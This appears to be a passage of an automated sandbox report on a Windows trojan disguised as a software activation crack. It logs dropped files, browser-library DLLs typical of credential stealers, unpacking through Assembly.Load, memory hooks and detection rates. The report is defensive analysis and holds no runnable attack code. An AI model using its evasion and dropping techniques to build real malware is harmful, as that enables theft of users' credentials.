                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 004585A0 appears 124 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00406F54 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00403494 appears 84 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00446594 appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 0040357C appears 34 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 004462C4 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 004349CC appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00403684 appears 233 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: String function: 00407D84 appears 43 times
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00424014 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00412A68 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0047AC34 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042FA00 NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00457E24 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042EDC4: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: KbqArOlW06.exeStatic PE information: No import functions for PE file found
                      Source: KbqArOlW06.exe, 00000000.00000002.469170712.0000000001122000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
                      Source: KbqArOlW06.exe, 00000000.00000002.472580658.0000000001B9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs KbqArOlW06.exe
                      Source: KbqArOlW06.exeBinary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
                      Source: KbqArOlW06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.logJump to behavior
                      Source: classification engineClassification label: mal60.troj.spyw.evad.winEXE@7/13@0/1
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_0040A10C FindResourceA,SizeofResource,LoadResource,LockResource,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                      Source: KbqArOlW06.exeVirustotal: Detection: 26%
                      Source: KbqArOlW06.exeMetadefender: Detection: 28%
                      Source: KbqArOlW06.exeReversingLabs: Detection: 69%
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\KbqArOlW06.exe "C:\Users\user\Desktop\KbqArOlW06.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeProcess created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeProcess created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeFile created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0045663C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: KbqArOlW06.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeMutant created: \Sessions\1\BaseNamedObjects\CCOYS///hdr
                      Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpWindow found: window name: TSelectLanguageForm
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: OK
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: Next >
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: I accept the agreement
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: Next >
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: I accept the agreement
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: Next >
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: KbqArOlW06.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: KbqArOlW06.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: KbqArOlW06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: KbqArOlW06.exeStatic file information: File size 12978176 > 1048576
                      Source: KbqArOlW06.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xc51c00
                      Source: KbqArOlW06.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
                      Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
                      Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
                      Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
                      Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
                      Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: KbqArOlW06.exe, ???????????????????.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Obfuscated command line found
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeProcess created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeProcess created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00406A50 push 00406A8Dh; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_004040B5 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00404185 push 00404391h; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00404206 push 00404391h; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_004042E8 push 00404391h; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_00404283 push 00404391h; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_004093EC push 0040941Fh; ret
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeCode function: 21_2_004085B8 push ecx; mov dword ptr [esp], eax
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00409DDC push 00409E19h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0041A0B8 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00452194 push ecx; mov dword ptr [esp], eax
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004062CC push ecx; mov dword ptr [esp], eax
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0040A2DF push ds; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004605AC push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00458848 push 00458880h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00410970 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00412DB8 push 00412E1Bh; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0040D2C8 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0040546D push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0040553D push 00405749h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004055BE push 00405749h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0040563B push 00405749h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_004056A0 push 00405749h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0040F828 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00443930 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00487AF0 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00459B60 push 00459BA4h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00497B18 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00479C7C push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00451FD0 push 00452003h; ret
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: section name: .2vB
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: section name: .a|D
                      Source: 2.0.0-beta2.cps.exe.0.drStatic PE information: section name: .=xC
                      Source: nss3.dll.16.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.16.drStatic PE information: section name: .didat
                      Source: mozglue.dll.16.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.16.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.16.drStatic PE information: section name: .00cfg
                      Source: sqlite3.dll.16.drStatic PE information: section name: /4
                      Source: sqlite3.dll.16.drStatic PE information: section name: /19
                      Source: sqlite3.dll.16.drStatic PE information: section name: /31
                      Source: sqlite3.dll.16.drStatic PE information: section name: /45
                      Source: sqlite3.dll.16.drStatic PE information: section name: /57
                      Source: sqlite3.dll.16.drStatic PE information: section name: /70
                      Source: sqlite3.dll.16.drStatic PE information: section name: /81
                      Source: sqlite3.dll.16.drStatic PE information: section name: /92
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .=xC
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeFile created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeFile created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeFile created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmpJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeMemory written: PID: 2332 base: 960005 value: E9 FB 99 A8 76
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeMemory written: PID: 2332 base: 773E9A00 value: E9 0A 66 57 89
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeMemory written: PID: 2332 base: 980007 value: E9 7B 4C AA 76
                      Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exeMemory written: PID: 2332 base: 77424C80 value: E9 8E B3 55 89
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00422CEC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0041815E IsIconic,SetWindowPos,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00418160 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042466C IsIconic,SetActiveWindow,SetFocus,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00424624 IsIconic,SetActiveWindow,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00418814 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0042F75C IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00417A28 IsIconic,GetCapture,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_00485CFC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpCode function: 22_2_0041F5A8 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmpRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\KbqArOlW06.exeProcess information set: NOOPENFILEERRORBOX
